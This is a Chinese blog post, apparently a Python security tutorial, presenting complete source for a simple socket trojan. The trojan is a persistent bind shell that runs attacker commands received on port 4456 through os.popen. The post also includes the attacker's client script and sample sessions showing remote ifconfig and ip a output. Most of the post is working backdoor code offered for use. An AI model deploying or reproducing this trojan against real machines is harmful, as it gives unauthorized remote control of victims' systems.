利用socket实现简单木马

python安全编程
发布日期:   2024-07-09
更新日期:   2024-07-11
文章字数:   584
阅读时长:   3 分

Python:socket实现简单木马

ps:实现无限挂后台

原理:将目标机本身作为TCP协议服务器,开启本网卡所有监听,由攻击机远程socket连接,实现命令执行

附上源码:

# 服务器端木马源码:

import socket
import os

def attack():
    try:
        io = socket.socket()
        io.bind(('0.0.0.0', 4456))
        print('服务器开始运行。。。')
        io.listen()
        chanel, client = io.accept()
        print(f'接收来自{client}的链接')
        
        while True:
            receive = chanel.recv(1024).decode()

            if receive.startswith('++++'):
                command = receive.split(',')[1]
                reply = os.popen(command).read()
                chanel.send(f'执行结果:\n{reply}'.encode())
            else:
                print(f'收到{client}的消息:{receive}')
                message = receive.replace('吗?','!')
                chanel.send(message.encode())
    except:
        io.close()
        attack()
        
if __name__ == '__main__':
    attack()

# 攻击机源码:

import socket 

io = socket.socket()
io.connect(('192.168.1.128', 4456))
while True:
    message = input('请输入信息:')
    io.send(message.encode())
    receive = io.recv(1024)
    print(f'服务器回复:{receive.decode()}')

使用范例:

# 范例一:
PS D:\vscode\security_python\socket_test> & C:/Users/郑际濠/AppData/Local/Programs/Python/Python38/python.exe d:/vscode/security_python/socket_test/socket_client.py
请输入信息:666
服务器回复:666
请输入信息:听的见吗?
服务器回复:听的见!

# 范例二:
请输入信息:++++,ifconfig
服务器回复:执行结果:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.128  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::1252:ebcd:b4cf:c784  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1c:18:34  txqueuelen 1000  (Ethernet)
        RX packets 190  bytes 13531 (13.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 157  bytes 16850 (16.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

# 范例三:
请输入信息:++++,ip a
服务器回复:执行结果:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:1c:18:34 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.128/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
       valid_lft 1334sec preferred_lft 1334sec
    inet6 fe80::1252:ebcd:b4cf:c784/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
文章作者: 矢坕
文章链接: http://airunfive.github.io/2024/07/09/%E5%88%A9%E7%94%A8socket%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E6%9C%A8%E9%A9%AC/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
python安全编程
  目录